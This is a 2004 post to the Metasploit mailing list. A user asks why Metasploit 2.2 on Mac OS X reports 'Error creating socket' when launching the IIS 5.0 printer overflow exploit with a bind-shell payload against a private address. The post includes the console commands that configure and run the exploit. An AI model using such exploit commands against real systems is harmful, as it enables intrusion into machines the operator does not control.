Metasploit mailing list archives

problem metasploit creating socket

From: jasanchezo at e-nfinito.com (Jose Alejandro Sanchez Ortega)
Date: Tue, 14 Sep 2004 18:13:40 -0500

Hi!

I am using Mac X 10.3.5 (panther), and I am probing Framework
Metasploit 2.2 in console mode. When a probe with a IIS 5.5 printer
overflow and win32_bind and win32_reverse payloads; I have problems at
the moment creating the shell with the overflow dump:

msf > use iis50_printer_overflow
msf iis50_printer_overflow > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf iis50_printer_overflow(win32_bind) > show targets

Supported Exploit Targets
=========================

    0  Windows 2000 SP0/SP1

msf iis50_printer_overflow(win32_bind) > set TARGET 0
TARGET -> 0
msf iis50_printer_overflow(win32_bind) > show options

Exploit and Payload Options
===========================

   Exploit:    Name      Default    Description
   --------    ------    -------    ------------------
   required    RPORT     80         The target port
   required    RHOST                The target address
   optional    SSL                  Use SSL

   Payload:    Name        Default    Description
   --------    --------    -------
   required    LPORT       4444       Listening port for bind shell
   optional    EXITFUNC    seh        Exit technique: "process",
"thread", "seh"

   Target: Windows 2000 SP0/SP1

msf iis50_printer_overflow(win32_bind) > set RHOST 172.16.25.22
RHOST -> 172.16.25.22
msf iis50_printer_overflow(win32_bind) > check
[*] Error creating socket: Connection failed: Invalid argument
msf iis50_printer_overflow(win32_bind) > show options

Exploit and Payload Options
===========================

   Exploit:    Name      Default         Description
   --------    ------    ------------    ------------------
   required    RPORT     80              The target port
   required    RHOST     172.16.25.22    The target address
   optional    SSL                       Use SSL

   Payload:    Name        Default    Description
   --------    --------    -------
   required    LPORT       4444       Listening port for bind shell
   optional    EXITFUNC    seh        Exit technique: "process",
"thread", "seh"

   Target: Windows 2000 SP0/SP1

msf iis50_printer_overflow(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Trying Windows 2000 SP0/SP1 using return to esp at 0x732c45f3...
[*] Error creating socket: Connection failed: Invalid argument
[*] Exiting Bind Handler.

msf iis50_printer_overflow(win32_bind) >

Any idea?

P.D.: sorry, I not speak english

Alex